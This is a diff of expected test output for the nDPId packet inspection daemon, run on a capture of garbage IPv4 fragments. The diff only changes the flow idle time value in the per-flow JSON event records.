-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244027129,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjUxKSgqJl4lJCNAIyQlXiYeLwAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244027129,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjUxKSgqJl4lJCNAIyQlXiYeLwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2506,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027129} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2506,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiooKiZeJSQjcnNkbHVoZ2s="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2507,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027129} @@ -5634,8 +5634,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2816,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmJrbnZjLy50Z2Z0Zz9HUj8="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2817,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027133} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2817,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdSP3NSPzc0"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027433,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjgzOTYpKComXiUkI0AhQCMkIQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027433,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjgzOTYpKComXiUkI0AhQCMkIQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2819,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027433} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2819,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQlXiYqKCkoKiZeJSQjQCM="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2820,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027433} @@ -6260,8 +6260,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3129,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiYqKComXiUkIyYqKEtJSkg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3130,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027437} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3130,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdGRDIqJkRG"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027737,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdISksmXiUkIyNFVFIlWV76VAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027737,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdISksmXiUkIyNFVFIlWV76VAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3132,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027737} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3132,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAlUmSSpPUHsiOmhkZmxrZGE="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3133,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027737} @@ -6886,8 +6886,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3442,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAk1OQkhHRkRFVyNAJCVeSEI="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3443,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027741} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3443,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdWCjQyMTQ2"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244028041,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjMxOTgyMDUxKSgqJl4lJCNCBAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244028041,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjMxOTgyMDUxKSgqJl4lJCNCBAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3445,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028041} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3445,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkAjJCVeJiooKiZeJSQjcnM="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3446,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028041} @@ -7512,8 +7512,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3755,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmhna2Zkc2JrbnZjLy50Z2Y="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3756,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028045} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3756,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnRnP0dSP0dS"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244028345,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9zUj83NDgzOTYpKComXiX\/oQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244028345,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9zUj83NDgzOTYpKComXiX\/oQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3758,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028345} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3758,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjQCFAIyQlXiYqKCkoKiY="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3759,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028345} @@ -8138,8 +8138,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4068,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiNAIyQlXiYqKComXiUkIyY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4069,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028349} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4069,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiooS0lKSEdG"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244028649,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkQyKiZERkdISksmXiUkIyM4jgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244028649,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkQyKiZERkdISksmXiUkIyM4jgAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4071,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028649} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4071,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkVUUiVZXlUmSSpPUHsiOmg="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4072,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028649} @@ -8764,8 +8764,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4381,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmtkYT5MPE1OQkhHRkRFVyM="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4382,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028653} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4382,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkAkJV5IQkdW"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244028953,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSh91wAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244028953,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSh91wAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4384,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028953} 